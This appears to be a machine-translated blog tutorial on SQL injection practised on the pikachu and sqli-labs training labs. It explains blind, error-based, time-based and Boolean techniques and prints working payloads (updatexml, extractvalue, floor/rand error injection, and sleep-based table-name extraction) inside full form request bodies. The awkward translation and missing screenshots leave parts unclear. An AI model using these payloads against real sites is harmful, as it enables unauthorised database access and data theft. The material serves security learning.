SQL injection (query method and blind injection)

Many injections have no echo, which may be caused by the problem of SQL query method. At this time, we need to use relevant error reporting or blind injection for subsequent operations.

sql statement addition, deletion, modification and query:

For example, insert statement injection can be used to inject into the database during user registration.

We need to judge the injection point and guess the SQL query method according to the place where the injection point is generated, which can not be limited to the select statement. Judge the relationship between the website and the database according to the function of the website, and guess the SQL query method.

pikachu shooting range actual combat:
Injection may occur during login / registration:

See the source code of the registration page:

When trying to inject into the registry, it is found that the order by input is wrong and the relevant configuration will not be revealed. Because the insert statement does not support it, only an error sentence will be reported and the statement will not be executed. At this time, blind injection is required!:

You can echo "$query" to analyze the reason in mysql:

Blind note:

Blind injection means that the acquired data cannot be echoed to the front page during the injection process. At this time, we need to use some methods to judge or try. This process is called blind injection. We can know that blind injection can be divided into the following three categories:

  • Boolean based SQL blind annotation - logical judgment (judgment without echo): regexp, like, ascii, left, ord, mid

  • Time based blind SQL injection delay judgment (judgment without echo): if, sleep

  • SQL blind annotation based on error reporting - error reporting echo: floor, updatexml, extractvalue, etc

Different databases may have different function names, but the principle is the same.

12 kinds of error injection + universal statements

Error reporting note: pikachu shooting range insert injection:

Database information returned when an error is reported (0xe7 is "~" for identification and filtering):

Version information returned in case of error:

Query the database name corresponding to the website:


pikachu insert

username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e)))
from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
or '&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

username=x' or updatexml(1,concat(0x7e,(version())),0) or

username=x' or extractvalue(1,concat(0x7e,database())) or

pikachu update

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&email=wuhan&submit=submit 

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit

sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit

pikachu delete




Similarly, on the successfully logged in modification information page, update statement injection and delete injection can be used. Therefore, injection may exist wherever there is interaction with the database!:

Time note:

sleep function:

if function:

When the combined insert is used, it returns 1 when it is true, so it is delayed for 1 second. If it is false, it appears directly:

At the same time, it can be intercepted by substr() function, so that it can be better guessed during black box. Similarly, length() function and so on can be converted into numbers for Boolean judgment of right and wrong:

Similarly, ascii function is more recommended, which is convenient for writing py scripts to traverse and explode flag s:

ascii table:

Specific table name of delay judgment:

and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)--+

limit 0,1 function: This is in information_ In the tables table of schema database, the first 0 is the index, 0 represents the first, and the last 1 represents the displayed rows, 1 represents the selection of 1 row, 2 represents 2 rows...:

Boolean note:

When the successful injection / condition is true, it does not echo, but "you are in..." appears:

If the condition is not tenable, there is no echo, which proves that the beginning of the database version number is not 6:

In fact, it is similar to the principle of delayed injection, which is mainly different from several functions.

For more payload s, read sqlilabs into the book of heaven. This book is relatively complete and form a good habit of reading documents.

Tags: Database SQL Web Security

Posted on Tue, 09 Nov 2021 20:19:00 -0500 by MikeX